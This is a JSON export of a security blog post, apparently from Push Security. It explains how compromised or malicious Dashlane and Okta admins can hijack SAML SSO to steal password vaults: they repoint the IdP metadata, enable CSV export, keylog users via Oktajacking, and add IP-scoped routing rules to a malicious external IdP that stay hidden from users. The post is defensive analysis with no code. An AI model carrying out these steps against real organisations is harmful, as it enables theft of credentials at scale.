",[],{},{"nodeType":178,"data":260131,"content":260132},{},[260133],{"nodeType":173,"value":260134,"marks":260135,"data":260136},"However, the SaaS-ification of password managers over time and integration with other parts of the identity management stack means that they are prone to the same weaknesses as many other apps - only in this case the prize is the secrets and passwords used to gain access to a huge number of other systems that those admins wouldn’t otherwise have direct access to. For an attacker looking to move laterally, this is a goldmine! ",[],{},{"nodeType":178,"data":260138,"content":260139},{},[260140],{"nodeType":173,"value":260141,"marks":260142,"data":260143},"We’ll now consider how two different types of admin accounts can use this functionality to gain access to password secrets for lateral movement elsewhere, in the event of a compromised admin account or insider threat.",[],{},{"nodeType":235,"data":260145,"content":260146},{},[260147],{"nodeType":173,"value":260148,"marks":260149,"data":260150},"SaaS admin - modifying SSO settings",[],{},{"nodeType":178,"data":260152,"content":260153},{},[260154],{"nodeType":173,"value":260155,"marks":260156,"data":260157},"Continuing the Dashlane scenario, an administrator of the app can simply modify the SSO settings in order to point to a different IdP that they control. This could be a different Okta tenant they have set up themselves, or it could be an entirely different IdP. ",[],{},{"nodeType":178,"data":260159,"content":260160},{},[260161],{"nodeType":173,"value":260162,"marks":260163,"data":260164},"In this case, we can simply change the IdP metadata to point to a different SAML endpoint. Pointing to a different Okta tenant means we can now login to Dashlane using a different identity provider as before. ",[],{},{"nodeType":312,"data":260166,"content":260170},{"target":260167},{"sys":260168},{"id":260169,"type":317,"linkType":318},"5hXZ4NogWGdCj18LalxVQl",[],{"nodeType":178,"data":260172,"content":260173},{},[260174],{"nodeType":173,"value":260175,"marks":260176,"data":260177},"The implication here is that the malicious/compromised admin account can simply configure their own malicious IdP in a way that they can authenticate with any account. They can then use this to login to Dashlane as any user they like. The only caveat in the case of Dashlane is that Dashlane admin accounts cannot use SSO and so the malicious admin cannot access other admin accounts' secrets so easily. ",[],{},{"nodeType":178,"data":260179,"content":260180},{},[260181],{"nodeType":173,"value":260182,"marks":260183,"data":260184},"Our malicious admin can then simply login to access their account of choice and view the secrets as they please. They can do this manually, or they can even use the export functionality to export the entire password vault into a CSV file. The latter is disabled by default in Dashlane, but we’re an admin, right? So we can just enable the security policy to allow it!",[],{},{"nodeType":312,"data":260186,"content":260190},{"target":260187},{"sys":260188},{"id":260189,"type":317,"linkType":318},"64ttjHyIDYKJ7gXAugT84f",[],{"nodeType":312,"data":260192,"content":260196},{"target":260193},{"sys":260194},{"id":260195,"type":317,"linkType":318},"2tm9koiqywJtrEOuRbazFd",[],{"nodeType":312,"data":260198,"content":260202},{"target":260199},{"sys":260200},{"id":260201,"type":317,"linkType":318},"3gAbFuYpJxbYhmeaph9e7e",[],{"nodeType":178,"data":260204,"content":260205},{},[260206],{"nodeType":173,"value":260207,"marks":260208,"data":260209},"Fortunately, a simple implementation of this attack will break logins by other users, as all users will be directed to the new malicious IdP. This means the attack is more likely to be quickly detected once users begin questioning why they cannot login to their Dashlane account. ",[],{},{"nodeType":178,"data":260211,"content":260212},{},[260213],{"nodeType":173,"value":260214,"marks":260215,"data":260216},"Unfortunately, attackers can take steps to avoid this by building a more sophisticated malicious IdP that accepts any password or performs some other clever redirect. This means that legitimate users can still successfully access their Dashlane accounts while the admin simultaneously hijacks their target accounts. ",[],{},{"nodeType":178,"data":260218,"content":260219},{},[260220,260224,260231],{"nodeType":173,"value":260221,"marks":260222,"data":260223},"One method is to use the Oktajacking technique discussed ",[],{},{"nodeType":186,"data":260225,"content":260226},{"uri":162243},[260227],{"nodeType":173,"value":260228,"marks":260229,"data":260230},"in this article",[],{},{"nodeType":173,"value":260232,"marks":260233,"data":260234}," to accept any credentials the user enters, while also keylogging them for further use. This enables the attacker to login as any user they like while also ensuring the real user can still login, whatever credentials they enter. This would allow the attack to go unnoticed for longer, giving the attacker the time and space to achieve their objectives without being hounded by incident responders (and in some cases persisting indefinitely).",[],{},{"nodeType":235,"data":260236,"content":260237},{},[260238],{"nodeType":173,"value":260239,"marks":260240,"data":260241},"Okta admin - external IdPs and routing rules",[],{},{"nodeType":178,"data":260243,"content":260244},{},[260245],{"nodeType":173,"value":260246,"marks":260247,"data":260248},"OK, obviously an admin account for Okta (or any type of IdP) is a very powerful tool for an attacker and there are plenty of malicious actions they could take. In this case we’ll consider how they could use it to gain access to Dashlane as any user, assuming Okta was being used as a SAML IdP as in the example above.",[],{},{"nodeType":178,"data":260250,"content":260251},{},[260252],{"nodeType":173,"value":260253,"marks":260254,"data":260255},"The simplest path here would be to use an external IdP, along with a routing rule, to allow the admin to login to Okta using a separate IdP they control, whilst continuing to allow the user to authenticate. This way, the user themselves would have no idea anything else had changed, but the attacker could easily impersonate any user they choose.",[],{},{"nodeType":178,"data":260257,"content":260258},{},[260259,260263,260271,260275,260283],{"nodeType":173,"value":260260,"marks":260261,"data":260262},"Adam Chester’s iconic post on ",[],{},{"nodeType":186,"data":260264,"content":260266},{"uri":260265},"https://trustedsec.com/blog/okta-for-red-teamers",[260267],{"nodeType":173,"value":260268,"marks":260269,"data":260270},"Okta for red teamers ",[],{},{"nodeType":173,"value":260272,"marks":260273,"data":260274},"covers the user of a malicious SAML provider for authenticating as any user and he even includes a ",[],{},{"nodeType":186,"data":260276,"content":260278},{"uri":260277},"https://github.com/xpn/OktaPostExToolkit",[260279],{"nodeType":173,"value":260280,"marks":260281,"data":260282},"simple python based SAML IdP",[],{},{"nodeType":173,"value":260284,"marks":260285,"data":260286}," that allows for this.",[],{},{"nodeType":178,"data":260288,"content":260289},{},[260290],{"nodeType":173,"value":260291,"marks":260292,"data":260293},"If we combine this with Okta routing rules, then we can create a targeted backdoor that allows the attacker to utilize their Okta admin account to login as any user they like in order to access their Dashlane password vault, while being completely transparent to the real users. We can do this by ensuring the external identity provider is only used when logins are performed from the admin’s IP address and/or specific devices.",[],{},{"nodeType":312,"data":260295,"content":260299},{"target":260296},{"sys":260297},{"id":260298,"type":317,"linkType":318},"4vmkiiONUur1cxGWhvTNoY",[],{"nodeType":169,"data":260301,"content":260302},{},[260303],{"nodeType":173,"value":144122,"marks":260304,"data":260305},[],{},{"nodeType":178,"data":260307,"content":260308},{},[260309],{"nodeType":173,"value":260310,"marks":260311,"data":260312},"Shock, horror, admin accounts can be used to do bad things! Of course that’s the case, but it is important that as security practitioners we fully understand the implications of security decisions we make and have plans in place for if/when incidents arise.",[],{},{"nodeType":178,"data":260314,"content":260315},{},[260316],{"nodeType":173,"value":260317,"marks":260318,"data":260319},"We’ve known for many years that an attacker compromising a Windows desktop or Linux server can potentially steal passwords and other secrets from that system. We’ve also known that if an attacker compromises an entire Windows domain, then we should consider every single user’s password compromised. ",[],{},{"nodeType":178,"data":260321,"content":260322},{},[260323],{"nodeType":173,"value":260324,"marks":260325,"data":260326},"While incident responders would much prefer to contain an incident before a complete domain compromise is achieved, we at least know we have to have a plan in place for how to deal with all domain passwords having been compromised, plus golden tickets, silver tickets and all other manner of backdoors.  ",[],{},{"nodeType":178,"data":260328,"content":260329},{},[260330],{"nodeType":173,"value":260331,"marks":260332,"data":260333},"Of course, password managers are important to protect generally, but are we considering the true consequences and impact of either a malicious admin or a compromised admin account potentially allowing all password secrets to be stolen? Do we have a plan in place for how to recover from that like we would in the event of a windows domain compromise? These are the questions we need to be asking ourselves.",[],{},{"nodeType":312,"data":260335,"content":260338},{"target":260336},{"sys":260337},{"id":169040,"type":317,"linkType":318},[],{"nodeType":169,"data":260340,"content":260341},{},[260342],{"nodeType":173,"value":143524,"marks":260343,"data":260344},[],{},{"nodeType":178,"data":260346,"content":260347},{},[260348],{"nodeType":173,"value":260349,"marks":260350,"data":260351},"We’ve covered a lot of ground so let’s quickly take a step back and consider the key points of impact here:",[],{},{"nodeType":250,"data":260353,"content":260354},{},[260355,260365,260375],{"nodeType":254,"data":260356,"content":260357},{},[260358],{"nodeType":178,"data":260359,"content":260360},{},[260361],{"nodeType":173,"value":260362,"marks":260363,"data":260364},"SaaS-based password managers often allow SSO mechanisms with MFA which can provide stronger authentication, instead of the passwords being stored in a file encrypted with a single factor master password, which changes the risk profile",[],{},{"nodeType":254,"data":260366,"content":260367},{},[260368],{"nodeType":178,"data":260369,"content":260370},{},[260371],{"nodeType":173,"value":260372,"marks":260373,"data":260374},"That said, compromised admin accounts for either password manager apps, or their SSO IdPs, can be abused by attackers to steal passwords at scale by hijacking the SSO process",[],{},{"nodeType":254,"data":260376,"content":260377},{},[260378],{"nodeType":178,"data":260379,"content":260380},{},[260381],{"nodeType":173,"value":260382,"marks":260383,"data":260384},"This technique could become the windows domain hash dumping equivalent in the new cloud identity and SaaS-based world",[],{},{"nodeType":169,"data":260386,"content":260387},{},[260388],{"nodeType":173,"value":40632,"marks":260389,"data":260390},[],{},{"nodeType":178,"data":260392,"content":260393},{},[260394],{"nodeType":173,"value":260395,"marks":260396,"data":260397},"Password managers have quickly become an increasingly important part of identity security infrastructure. Passwords, and more generally secrets, are not going anywhere. So it makes sense for security-conscious organizations to provide their employees with a good password management solution.",[],{},{"nodeType":178,"data":260399,"content":260400},{},[260401],{"nodeType":173,"value":260402,"marks":260403,"data":260404},"Consequently, this means they will increasingly become a crown jewels target within modern cloud and SaaS-based organizations going forwards, much like windows domain controllers have often been the crown jewels in the past.",[],{},{"nodeType":178,"data":260406,"content":260407},{},[260408],{"nodeType":173,"value":260409,"marks":260410,"data":260411},"There are many methods by which different types of compromised admin accounts can be used to gain access to password manager secrets at scale by abusing SSO mechanisms and so security practitioners need to be aware of these attacks and plan for recovery actions in the event of a major incident. ",[],{},{"nodeType":178,"data":260413,"content":260414},{},[260415],{"nodeType":173,"value":260416,"marks":260417,"data":260418},"The defensive plans we’ve historically relied upon weren't designed for these new attacker methods, which effectively creates a blind spot. The attacker's goal hasn’t changed, but the environment (and how it can be targeted) has evolved - which means defenders need to adapt. ",[],{},{"entries":260420},{"hyperlink":260421,"inline":260422,"block":260423},[],[],[260424,260432,260439,260447,260454,260462,260470,260477],{"sys":260425,"__typename":5345,"title":260426,"caption":260427,"layoutMode":118,"file":260428},{"id":260087},"Dashlane SSO","Configuring SSO authentication in Dashlane by using SAML to allow Okta to act as an IdP",{"url":260429,"width":260430,"height":260431},"https://images.ctfassets.net/y1cdw1ablpvd/3AdVyWovacNCkP23xyACB3/b7a6064aebac0ca251b276626748bef7/image1.png",1094,911,{"sys":260433,"__typename":5345,"title":260434,"caption":260435,"layoutMode":118,"file":260436},{"id":260107},"Dashlane SSO Popup","Login prompt for Dashlane when using SSO authentication",{"url":260437,"width":53620,"height":260438},"https://images.ctfassets.net/y1cdw1ablpvd/7KpuYaCuKdWfpkrHc1gdQG/65507c178bcef3217aad455547f1d83c/image6.png",1176,{"sys":260440,"__typename":5345,"title":260441,"caption":260442,"layoutMode":118,"file":260443},{"id":260169},"IdP metadata","Modifying Dashlane SSO IdP metadata settings to hijack the SSO process by pointing to a different Okta tenant that the attacker controls",{"url":260444,"width":260445,"height":260446},"https://images.ctfassets.net/y1cdw1ablpvd/6NDvy4ySxNnUB8vQyToycU/7af8c8fc9a82851ddd734fc730487bc0/image7.png",796,283,{"sys":260448,"__typename":5345,"title":260449,"caption":260450,"layoutMode":118,"file":260451},{"id":260189},"Enable the security policy ","Accessing clear text passwords in Dashlane in an authenticated session",{"url":260452,"width":5358,"height":260453},"https://images.ctfassets.net/y1cdw1ablpvd/3audb7ABsy1fN7dqXY81h0/657f9c2b48b36b116fd81a1b15da0cf4/image3.png",981,{"sys":260455,"__typename":5345,"title":260456,"caption":260457,"layoutMode":118,"file":260458},{"id":260195},"Enable the security policy #2","Exporting Dashlane passwords in CSV format",{"url":260459,"width":260460,"height":260461},"https://images.ctfassets.net/y1cdw1ablpvd/7MnLtbQ0A0obog8ishdaOF/b55fb2d0e7af8052c784f10666a69768/image5.png",686,1020,{"sys":260463,"__typename":5345,"title":260464,"caption":260465,"layoutMode":118,"file":260466},{"id":260201},"Enable the security policy #3","Configuring Dashlane to allow export of passwords",{"url":260467,"width":260468,"height":260469},"https://images.ctfassets.net/y1cdw1ablpvd/3YAdW74nAGrHvHOMO5VlHI/6f16c492b00c4bcd11f7a73ba40f2292/image2.png",971,153,{"sys":260471,"__typename":5345,"title":260472,"caption":260473,"layoutMode":118,"file":260474},{"id":260298},"Identity Providers","Configuring Okta routing rules to use an external malicious identity provider when accessed using an attacker’s IP address. This can be used to access any application connected to Okta - not just Dashlane. ",{"url":260475,"width":260476,"height":6853},"https://images.ctfassets.net/y1cdw1ablpvd/77ukND4FQYghlzQPOtg7BK/e381508f376b03967f12ef70539b6d27/image4.png",1024,{"sys":260478,"__typename":15269,"type":112637,"ctaText":192192,"buttonLabel":192193,"buttonColour":15273,"buttonUrl":118},{"id":169040},"content:blog:can-my-admins-steal-my-cloud-password-manager-secrets.json","blog/can-my-admins-steal-my-cloud-password-manager-secrets.json","blog/can-my-admins-steal-my-cloud-password-manager-secrets",{"_path":260483,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":260484,"summary":260486,"title":162427,"subtitle":118,"metaTitle":260503,"synopsis":162428,"hashTags":118,"publishedDate":162429,"slug":162430,"ogImage":260504,"tagsCollection":260506,"relatedBlogPostsCollection":260512,"authorsCollection":261479,"content":261483,"_id":262103,"_type":5439,"_source":5440,"_file":262104,"_stem":262105,"_extension":5439},"/blog/5-ways-to-defeat-identity-based-attacks",{"id":161739,"publishedAt":260485},"2026-01-30T09:27:40.111Z",{"json":260487},{"data":260488,"content":260489,"nodeType":165},{},[260490,260497],{"data":260491,"content":260492,"nodeType":178},{},[260493],{"data":260494,"marks":260495,"value":260496,"nodeType":173},{},[],"In today's digital world, identities are the new frontier for attackers seeking to breach organizational perimeters. As the attack surface evolves, so too must our strategies for defending against threats. Below are five key tactics to bolster your defenses and thwart identity-based attacks.",{"data":260498,"content":260499,"nodeType":178},{},[260500],{"data":260501,"marks":260502,"value":37,"nodeType":173},{},[],"Push Security: 5 Ways to Defeat Identity-Based Attacks",{"url":260505},"https://images.ctfassets.net/y1cdw1ablpvd/4fNcMVZPgTYGgMRk7Wn0pd/9195a26bf242fa006e61ba45778f248f/Identity-Based-Attacks.png",{"items":260507},[260508,260510],{"sys":260509,"name":26137},{"id":26136},{"sys":260511,"name":509},{"id":508},{"items":260513},[260514,261189],{"__typename":1528,"sys":260515,"content":260516,"title":209117,"synopsis":209118,"hashTags":118,"publishedDate":209119,"slug":209120,"tagsCollection":261179,"authorsCollection":261185},{"id":208338},{"json":260517},{"nodeType":165,"data":260518,"content":260519},{},[260520,260526,260532,260538,260544,260550,260556,260561,260577,260583,260619,260625,260631,260667,260683,260689,260695,260701,260717,260733,260739,260769,260775,260791,260797,260803,260829,260845,260851,260856,260862,260868,260874,260880,260886,260892,260898,260904,260910,260916,260922,260928,260941,260947,261003,261009,261015,261038,261051,261057,261063,261069,261095,261112,261118,261124,261130,261136,261152,261168,261173],{"nodeType":178,"data":260521,"content":260522},{},[260523],{"nodeType":173,"value":208347,"marks":260524,"data":260525},[],{},{"nodeType":178,"data":260527,"content":260528},{},[260529],{"nodeType":173,"value":208354,"marks":260530,"data":260531},[],{},{"nodeType":178,"data":260533,"content":260534},{},[260535],{"nodeType":173,"value":208361,"marks":260536,"data":260537},[],{},{"nodeType":178,"data":260539,"content":260540},{},[260541],{"nodeType":173,"value":208368,"marks":260542,"data":260543},[],{},{"nodeType":169,"data":260545,"content":260546},{},[260547],{"nodeType":173,"value":208375,"marks":260548,"data":260549},[],{},{"nodeType":178,"data":260551,"content":260552},{},[260553],{"nodeType":173,"value":208382,"marks":260554,"data":260555},[],{},{"nodeType":312,"data":260557,"content":260560},{"target":260558},{"sys":260559},{"id":208389,"type":317,"linkType":318},[],{"nodeType":178,"data":260562,"content":260563},{},[260564,260567,260574],{"nodeType":173,"value":208395,"marks":260565,"data":260566},[],{},{"nodeType":186,"data":260568,"content":260569},{"uri":88239},[260570],{"nodeType":173,"value":197982,"marks":260571,"data":260573},[260572],{"type":194},{},{"nodeType":173,"value":1477,"marks":260575,"data":260576},[],{},{"nodeType":178,"data":260578,"content":260579},{},[260580],{"nodeType":173,"value":208412,"marks":260581,"data":260582},[],{},{"nodeType":178,"data":260584,"content":260585},{},[260586,260589,260596,260599,260606,260609,260616],{"nodeType":173,"value":208419,"marks":260587,"data":260588},[],{},{"nodeType":186,"data":260590,"content":260591},{"uri":106815},[260592],{"nodeType":173,"value":208426,"marks":260593,"data":260595},[260594],{"type":194},{},{"nodeType":173,"value":933,"marks":260597,"data":260598},[],{},{"nodeType":186,"data":260600,"content":260601},{"uri":208435},[260602],{"nodeType":173,"value":208438,"marks":260603,"data":260605},[260604],{"type":194},{},{"nodeType":173,"value":208443,"marks":260607,"data":260608},[],{},{"nodeType":186,"data":260610,"content":260611},{"uri":162296},[260612],{"nodeType":173,"value":208450,"marks":260613,"data":260615},[260614],{"type":194},{},{"nodeType":173,"value":208455,"marks":260617,"data":260618},[],{},{"nodeType":178,"data":260620,"content":260621},{},[260622],{"nodeType":173,"value":208462,"marks":260623,"data":260624},[],{},{"nodeType":235,"data":260626,"content":260627},{},[260628],{"nodeType":173,"value":208469,"marks":260629,"data":260630},[],{},{"nodeType":178,"data":260632,"content":260633},{},[260634,260637,260644,260647,260654,260657,260664],{"nodeType":173,"value":208476,"marks":260635,"data":260636},[],{},{"nodeType":186,"data":260638,"content":260639},{"uri":184680},[260640],{"nodeType":173,"value":182807,"marks":260641,"data":260643},[260642],{"type":194},{},{"nodeType":173,"value":933,"marks":260645,"data":260646},[],{},{"nodeType":186,"data":260648,"content":260649},{"uri":197109},[260650],{"nodeType":173,"value":197114,"marks":260651,"data":260653},[260652],{"type":194},{},{"nodeType":173,"value":208497,"marks":260655,"data":260656},[],{},{"nodeType":186,"data":260658,"content":260659},{"uri":197770},[260660],{"nodeType":173,"value":208504,"marks":260661,"data":260663},[260662],{"type":194},{},{"nodeType":173,"value":208509,"marks":260665,"data":260666},[],{},{"nodeType":178,"data":260668,"content":260669},{},[260670,260673,260680],{"nodeType":173,"value":208516,"marks":260671,"data":260672},[],{},{"nodeType":186,"data":260674,"content":260675},{"uri":208521},[260676],{"nodeType":173,"value":208524,"marks":260677,"data":260679},[260678],{"type":194},{},{"nodeType":173,"value":208529,"marks":260681,"data":260682},[],{},{"nodeType":178,"data":260684,"content":260685},{},[260686],{"nodeType":173,"value":208536,"marks":260687,"data":260688},[],{},{"nodeType":178,"data":260690,"content":260691},{},[260692],{"nodeType":173,"value":208543,"marks":260693,"data":260694},[],{},{"nodeType":235,"data":260696,"content":260697},{},[260698],{"nodeType":173,"value":208550,"marks":260699,"data":260700},[],{},{"nodeType":178,"data":260702,"content":260703},{},[260704,260707,260714],{"nodeType":173,"value":208557,"marks":260705,"data":260706},[],{},{"nodeType":186,"data":260708,"content":260709},{"uri":208562},[260710],{"nodeType":173,"value":208565,"marks":260711,"data":260713},[260712],{"type":194},{},{"nodeType":173,"value":208570,"marks":260715,"data":260716},[],{},{"nodeType":178,"data":260718,"content":260719},{},[260720,260723,260730],{"nodeType":173,"value":208577,"marks":260721,"data":260722},[],{},{"nodeType":186,"data":260724,"content":260725},{"uri":144083},[260726],{"nodeType":173,"value":144086,"marks":260727,"data":260729},[260728],{"type":194},{},{"nodeType":173,"value":208588,"marks":260731,"data":260732},[],{},{"nodeType":178,"data":260734,"content":260735},{},[260736],{"nodeType":173,"value":208595,"marks":260737,"data":260738},[],{},{"nodeType":250,"data":260740,"content":260741},{},[260742,260751,260760],{"nodeType":254,"data":260743,"content":260744},{},[260745],{"nodeType":178,"data":260746,"content":260747},{},[260748],{"nodeType":173,"value":208608,"marks":260749,"data":260750},[],{},{"nodeType":254,"data":260752,"content":260753},{},[260754],{"nodeType":178,"data":260755,"content":260756},{},[260757],{"nodeType":173,"value":208618,"marks":260758,"data":260759},[],{},{"nodeType":254,"data":260761,"content":260762},{},[260763],{"nodeType":178,"data":260764,"content":260765},{},[260766],{"nodeType":173,"value":208628,"marks":260767,"data":260768},[],{},{"nodeType":178,"data":260770,"content":260771},{},[260772],{"nodeType":173,"value":208635,"marks":260773,"data":260774},[],{},{"nodeType":178,"data":260776,"content":260777},{},[260778,260781,260788],{"nodeType":173,"value":208642,"marks":260779,"data":260780},[],{},{"nodeType":186,"data":260782,"content":260783},{"uri":59335},[260784],{"nodeType":173,"value":208649,"marks":260785,"data":260787},[260786],{"type":194},{},{"nodeType":173,"value":208654,"marks":260789,"data":260790},[],{},{"nodeType":235,"data":260792,"content":260793},{},[260794],{"nodeType":173,"value":208661,"marks":260795,"data":260796},[],{},{"nodeType":178,"data":260798,"content":260799},{},[260800],{"nodeType":173,"value":208668,"marks":260801,"data":260802},[],{},{"nodeType":178,"data":260804,"content":260805},{},[260806,260809,260816,260819,260826],{"nodeType":173,"value":208675,"marks":260807,"data":260808},[],{},{"nodeType":186,"data":260810,"content":260811},{"uri":208680},[260812],{"nodeType":173,"value":208683,"marks":260813,"data":260815},[260814],{"type":194},{},{"nodeType":173,"value":933,"marks":260817,"data":260818},[],{},{"nodeType":186,"data":260820,"content":260821},{"uri":832},[260822],{"nodeType":173,"value":835,"marks":260823,"data":260825},[260824],{"type":194},{},{"nodeType":173,"value":208698,"marks":260827,"data":260828},[],{},{"nodeType":178,"data":260830,"content":260831},{},[260832,260835,260842],{"nodeType":173,"value":208705,"marks":260833,"data":260834},[],{},{"nodeType":186,"data":260836,"content":260837},{"uri":208710},[260838],{"nodeType":173,"value":208713,"marks":260839,"data":260841},[260840],{"type":194},{},{"nodeType":173,"value":208718,"marks":260843,"data":260844},[],{},{"nodeType":178,"data":260846,"content":260847},{},[260848],{"nodeType":173,"value":208725,"marks":260849,"data":260850},[],{},{"nodeType":312,"data":260852,"content":260855},{"target":260853},{"sys":260854},{"id":169040,"type":317,"linkType":318},[],{"nodeType":169,"data":260857,"content":260858},{},[260859],{"nodeType":173,"value":208737,"marks":260860,"data":260861},[],{},{"nodeType":178,"data":260863,"content":260864},{},[260865],{"nodeType":173,"value":208744,"marks":260866,"data":260867},[],{},{"nodeType":178,"data":260869,"content":260870},{},[260871],{"nodeType":173,"value":208751,"marks":260872,"data":260873},[],{},{"nodeType":235,"data":260875,"content":260876},{},[260877],{"nodeType":173,"value":208758,"marks":260878,"data":260879},[],{},{"nodeType":178,"data":260881,"content":260882},{},[260883],{"nodeType":173,"value":208765,"marks":260884,"data":260885},[],{},{"nodeType":178,"data":260887,"content":260888},{},[260889],{"nodeType":173,"value":208772,"marks":260890,"data":260891},[],{},{"nodeType":178,"data":260893,"content":260894},{},[260895],{"nodeType":173,"value":208779,"marks":260896,"data":260897},[],{},{"nodeType":235,"data":260899,"content":260900},{},[260901],{"nodeType":173,"value":208786,"marks":260902,"data":260903},[],{},{"nodeType":178,"data":260905,"content":260906},{},[260907],{"nodeType":173,"value":208793,"marks":260908,"data":260909},[],{},{"nodeType":178,"data":260911,"content":260912},{},[260913],{"nodeType":173,"value":208800,"marks":260914,"data":260915},[],{},{"nodeType":178,"data":260917,"content":260918},{},[260919],{"nodeType":173,"value":208807,"marks":260920,"data":260921},[],{},{"nodeType":169,"data":260923,"content":260924},{},[260925],{"nodeType":173,"value":208814,"marks":260926,"data":260927},[],{},{"nodeType":178,"data":260929,"content":260930},{},[260931,260934,260938],{"nodeType":173,"value":208821,"marks":260932,"data":260933},[],{},{"nodeType":173,"value":208825,"marks":260935,"data":260937},[260936],{"type":1646},{},{"nodeType":173,"value":208830,"marks":260939,"data":260940},[],{},{"nodeType":235,"data":260942,"content":260943},{},[260944],{"nodeType":173,"value":208837,"marks":260945,"data":260946},[],{},{"nodeType":178,"data":260948,"content":260949},{},[260950,260953,260960,260963,260970,260973,260980,260983,260990,260993,261000],{"nodeType":173,"value":208844,"marks":260951,"data":260952},[],{},{"nodeType":186,"data":260954,"content":260955},{"uri":208849},[260956],{"nodeType":173,"value":208852,"marks":260957,"data":260959},[260958],{"type":194},{},{"nodeType":173,"value":933,"marks":260961,"data":260962},[],{},{"nodeType":186,"data":260964,"content":260965},{"uri":208861},[260966],{"nodeType":173,"value":208864,"marks":260967,"data":260969},[260968],{"type":194},{},{"nodeType":173,"value":208869,"marks":260971,"data":260972},[],{},{"nodeType":186,"data":260974,"content":260975},{"uri":208874},[260976],{"nodeType":173,"value":208877,"marks":260977,"data":260979},[260978],{"type":194},{},{"nodeType":173,"value":73790,"marks":260981,"data":260982},[],{},{"nodeType":186,"data":260984,"content":260985},{"uri":1297},[260986],{"nodeType":173,"value":208888,"marks":260987,"data":260989},[260988],{"type":194},{},{"nodeType":173,"value":208893,"marks":260991,"data":260992},[],{},{"nodeType":186,"data":260994,"content":260995},{"uri":208898},[260996],{"nodeType":173,"value":208901,"marks":260997,"data":260999},[260998],{"type":194},{},{"nodeType":173,"value":208906,"marks":261001,"data":261002},[],{},{"nodeType":178,"data":261004,"content":261005},{},[261006],{"nodeType":173,"value":208913,"marks":261007,"data":261008},[],{},{"nodeType":235,"data":261010,"content":261011},{},[261012],{"nodeType":173,"value":208920,"marks":261013,"data":261014},[],{},{"nodeType":178,"data":261016,"content":261017},{},[261018,261021,261025,261028,261035],{"nodeType":173,"value":208927,"marks":261019,"data":261020},[],{},{"nodeType":173,"value":208931,"marks":261022,"data":261024},[261023],{"type":194},{},{"nodeType":173,"value":208936,"marks":261026,"data":261027},[],{},{"nodeType":186,"data":261029,"content":261030},{"uri":208941},[261031],{"nodeType":173,"value":208944,"marks":261032,"data":261034},[261033],{"type":194},{},{"nodeType":173,"value":208949,"marks":261036,"data":261037},[],{},{"nodeType":178,"data":261039,"content":261040},{},[261041,261044,261048],{"nodeType":173,"value":208956,"marks":261042,"data":261043},[],{},{"nodeType":173,"value":208960,"marks":261045,"data":261047},[261046],{"type":1646},{},{"nodeType":173,"value":1477,"marks":261049,"data":261050},[],{},{"nodeType":178,"data":261052,"content":261053},{},[261054],{"nodeType":173,"value":208971,"marks":261055,"data":261056},[],{},{"nodeType":235,"data":261058,"content":261059},{},[261060],{"nodeType":173,"value":208978,"marks":261061,"data":261062},[],{},{"nodeType":178,"data":261064,"content":261065},{},[261066],{"nodeType":173,"value":208985,"marks":261067,"data":261068},[],{},{"nodeType":178,"data":261070,"content":261071},{},[261072,261075,261082,261085,261092],{"nodeType":173,"value":208992,"marks":261073,"data":261074},[],{},{"nodeType":186,"data":261076,"content":261077},{"uri":208997},[261078],{"nodeType":173,"value":209000,"marks":261079,"data":261081},[261080],{"type":194},{},{"nodeType":173,"value":209005,"marks":261083,"data":261084},[],{},{"nodeType":186,"data":261086,"content":261087},{"uri":209010},[261088],{"nodeType":173,"value":209013,"marks":261089,"data":261091},[261090],{"type":194},{},{"nodeType":173,"value":209018,"marks":261093,"data":261094},[],{},{"nodeType":178,"data":261096,"content":261097},{},[261098,261101,261109],{"nodeType":173,"value":209025,"marks":261099,"data":261100},[],{},{"nodeType":186,"data":261102,"content":261103},{"uri":209030},[261104],{"nodeType":173,"value":209033,"marks":261105,"data":261108},[261106,261107],{"type":194},{"type":1646},{},{"nodeType":173,"value":37,"marks":261110,"data":261111},[],{},{"nodeType":178,"data":261113,"content":261114},{},[261115],{"nodeType":173,"value":209045,"marks":261116,"data":261117},[],{},{"nodeType":169,"data":261119,"content":261120},{},[261121],{"nodeType":173,"value":209052,"marks":261122,"data":261123},[],{},{"nodeType":178,"data":261125,"content":261126},{},[261127],{"nodeType":173,"value":209059,"marks":261128,"data":261129},[],{},{"nodeType":178,"data":261131,"content":261132},{},[261133],{"nodeType":173,"value":209066,"marks":261134,"data":261135},[],{},{"nodeType":178,"data":261137,"content":261138},{},[261139,261142,261149],{"nodeType":173,"value":209073,"marks":261140,"data":261141},[],{},{"nodeType":186,"data":261143,"content":261144},{"uri":209078},[261145],{"nodeType":173,"value":209081,"marks":261146,"data":261148},[261147],{"type":194},{},{"nodeType":173,"value":1477,"marks":261150,"data":261151},[],{},{"nodeType":178,"data":261153,"content":261154},{},[261155,261158,261165],{"nodeType":173,"value":209092,"marks":261156,"data":261157},[],{},{"nodeType":186,"data":261159,"content":261160},{"uri":88239},[261161],{"nodeType":173,"value":197982,"marks":261162,"data":261164},[261163],{"type":194},{},{"nodeType":173,"value":197986,"marks":261166,"data":261167},[],{},{"nodeType":312,"data":261169,"content":261172},{"target":261170},{"sys":261171},{"id":209109,"type":317,"linkType":318},[],{"nodeType":178,"data":261174,"content":261175},{},[261176],{"nodeType":173,"value":37,"marks":261177,"data":261178},[],{},{"items":261180},[261181,261183],{"sys":261182,"name":505},{"id":504},{"sys":261184,"name":509},{"id":508},{"items":261186},[261187],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":261188},{"url":13981},{"__typename":1528,"sys":261190,"content":261191,"title":246348,"synopsis":246043,"hashTags":118,"publishedDate":246349,"slug":246350,"tagsCollection":261469,"authorsCollection":261475},{"id":245406},{"json":261192},{"nodeType":165,"data":261193,"content":261194},{},[261195,261200,261207,261217,261223,261229,261268,261273,261279,261285,261291,261297,261317,261323,261329,261391,261397,261403,261409,261414,261420,261426,261431,261437,261443,261448,261454],{"nodeType":312,"data":261196,"content":261199},{"target":261197},{"sys":261198},{"id":246037,"type":317,"linkType":318},[],{"nodeType":178,"data":261201,"content":261202},{},[261203],{"nodeType":173,"value":246043,"marks":261204,"data":261206},[261205],{"type":370},{},{"nodeType":178,"data":261208,"content":261209},{},[261210,261213],{"nodeType":173,"value":246051,"marks":261211,"data":261212},[],{},{"nodeType":173,"value":246055,"marks":261214,"data":261216},[261215],{"type":370},{},{"nodeType":178,"data":261218,"content":261219},{},[261220],{"nodeType":173,"value":246063,"marks":261221,"data":261222},[],{},{"nodeType":178,"data":261224,"content":261225},{},[261226],{"nodeType":173,"value":246070,"marks":261227,"data":261228},[],{},{"nodeType":250,"data":261230,"content":261231},{},[261232,261241,261250,261259],{"nodeType":254,"data":261233,"content":261234},{}